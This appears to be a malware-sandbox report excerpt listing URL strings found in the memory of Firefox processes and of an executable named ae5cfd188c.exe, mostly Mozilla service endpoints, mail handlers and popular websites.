Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/microsoft/TypeScript/issues/338).
Source: firefox.exe, 00000018.00000003.2659017231.000002BA5991F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshots
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/mozilla-services/screenshotschrome://browser/content/parent/ext-windows.js
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/blob/master/css-grid-2/MASONRY-EXPLAINER.md
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A45000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/w3c/csswg-drafts/issues/4650
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://github.com/zertosh/loose-envify)
Source: firefox.exe, 00000018.00000002.2886166420.0000180E51A04000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://google.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://helper1.dap.cloudflareresearch.com/v02
Source: firefox.exe, 00000018.00000002.2792299128.000002BA49C11000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://hg.mozilla.org/releases/mozilla-release/rev/68e4c357d26c5a1f075a1ec0c696d4fe684ed881
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://ideas.mozilla.org/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C29000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://img-getpocket.cdn.mozilla.net/X
Source: firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2795803239.000002BA555BC000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7E9000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submit
Source: firefox.exe, 00000018.00000002.2883372314.000002BA63796000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://incoming.telemetry.mozilla.org/submits
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://infra.spec.whatwg.org/#ascii-whitespace
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://install.mozilla.org
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B765000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B75A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://json-schema.org/draft/2019-09/schema
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/libraries/standalone-templates/#rendering-lit-html-templates
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/directives/#stylemap
Source: firefox.exe, 00000018.00000003.2777563699.000002BA61B40000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2721713786.000002BA61B41000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://lit.dev/docs/templates/expressions/#child-expressions)
Source: firefox.exe, 00000018.00000002.2822642036.000002BA5A07A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=%MOZILLA_API_KEY%resource://gre/modules/compone
Source: firefox.exe, 00000018.00000002.2841657939.000002BA5B88F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2827730700.000002BA5A403000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://location.services.mozilla.com/v1/country?key=7e40f68c-7938-4c5d-9f95-e61647c213eb
Source: firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.live.com
Source: firefox.exe, 00000018.00000003.2733288614.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2737226174.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2854854049.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2850287498.000002BA5C08B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2728347300.000002BA5CF4F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://login.microsoftonline.com
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56BD0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2804720273.000002BA56D1F000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.google.com/mail/?extsrc=mailto&url=%shttps://mail.google.com/mail/?extsrc=mailto&url=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.inbox.lv/compose?to=%sv
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%sgecko.handlerService.defaultHandlersVersionhttps://mail.inbox
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%shttps://e.mail.ru/cgi-bin/sentmsg?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mail.yahoo.co.jp/compose/?To=%st
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2841148791.000002BA5B71B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49CD7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C5372000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A786000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://merino.services.mozilla.com/api/v1/suggest
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mitmdetection.services.mozilla.com/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://mochitest.youtube.com/
Source: firefox.exe, 00000018.00000002.2797999061.000002BA55DB5000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2798630682.000002BA55E03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2792299128.000002BA49C03000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/?entrypoint=protection_report_monitor&utm_source=about-protections
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/about
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/breach-details/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/oauth/init?entrypoint=protection_report_monitor&utm_source=about-protect
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/breach-stats?includeResolved=true
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/dashboard
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://monitor.firefox.com/user/preferences
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla-ohttp-fakespot.fastly-edge.com/
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://mozilla.cloudflare-dns.com/dns-query
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://normandy.cdn.mozilla.net/api/v1
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://oauth.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ok.ru/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%s
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://outlook.live.com/default.aspx?rru=compose&to=%sresource://pdf.js/PdfJsDefaultPreferences.sys
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox&referrer=utm_source%3Dprotection_r
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://play.google.com/store/apps/details?id=org.mozilla.firefox.vpn&referrer=utm_source%3Dfirefox-
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/page/
Source: firefox.exe, 00000018.00000002.2837969712.000002BA5AE73000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://play.hbomax.com/player/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2806911409.000002BA57138000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2663208610.000002BA57133000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2797233592.000002BA55A7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%s
Source: firefox.exe, 00000018.00000002.2809778465.000002BA57CB2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://poczta.interia.pl/mh/?mailto=%sx
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E26000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://probeinfo.telemetry.mozilla.org/glean/repositories.
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://prod.ohttp-gateway.prod.webservices.mozgcp.net/ohttp-configs
Source: firefox.exe, 00000018.00000002.2808472802.000002BA57200000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profile.accounts.firefox.com/v1
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2784350375.000001B8C5000000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001D.00000002.2783767744.000001AF5A5A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: https://profiler.firefox.com
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://redux.js.org/api-reference/store#subscribe(listener)
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.com/exec/obidos/external-search/chrome://extensions/content/parent/ext-browserSet
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813831095.000002BA597AE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.de/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.amazon.fr/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.avito.ru/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.baidu.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.bbc.co.uk/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ctrip.com/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.co.uk/
Source: firefox.exe, 00000018.00000002.2888920201.000026C2BC404000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2883372314.000002BA63731000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ebay.de/
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.ecosia.org/newtab/
Source: ae5cfd188c.exe, 00000007.00000003.2547024349.0000000005600000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2794739483.000002BA554AD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2813105068.000002BA59634000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2809778465.000002BA57C7C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2800920930.000002BA56B17000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001A.00000002.2785432044.000001B8C53C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001D.00000002.2784347261.000001AF5A7F2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.expedia.com/?locale=en_US&siteid=1&semcid=US.UB.ADMARKETPLACE.GT-C-EN.HOTEL&SEMDTL=a1219
Source: firefox.exe, 00000018.00000002.2878984131.000002BA61F12000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2736817789.000002BA61F15000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2871904573.000002BA61A98000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/
Source: firefox.exe, 00000018.00000002.2875505657.000002BA61C14000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55EDE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2734749303.000002BA634DB000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2881483129.000002BA634D8000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2726304100.000002BA61D3B000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2722032655.000002BA61B30000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search
Source: firefox.exe, 00000018.00000002.2798630682.000002BA55E75000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2814174699.000002BA59800000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000018.00000003.2658761411.000002BA59700000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2660636691.000002BA5993C000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661028911.000002BA5995A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000002.2878984131.000002BA61F57000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000018.00000003.2661653128.000002BA59977000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/complete/search?client=firefox&q=
Source: ae5cfd188c.exe, 00000007.00000003.2496735561.000000000561F000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 00000007.00000003.2496918281.0000000005608000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630590484.0000000005428000.00000004.00000800.00020000.00000000.sdmp, ae5cfd188c.exe, 0000000A.00000003.2630411285.000000000543F000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
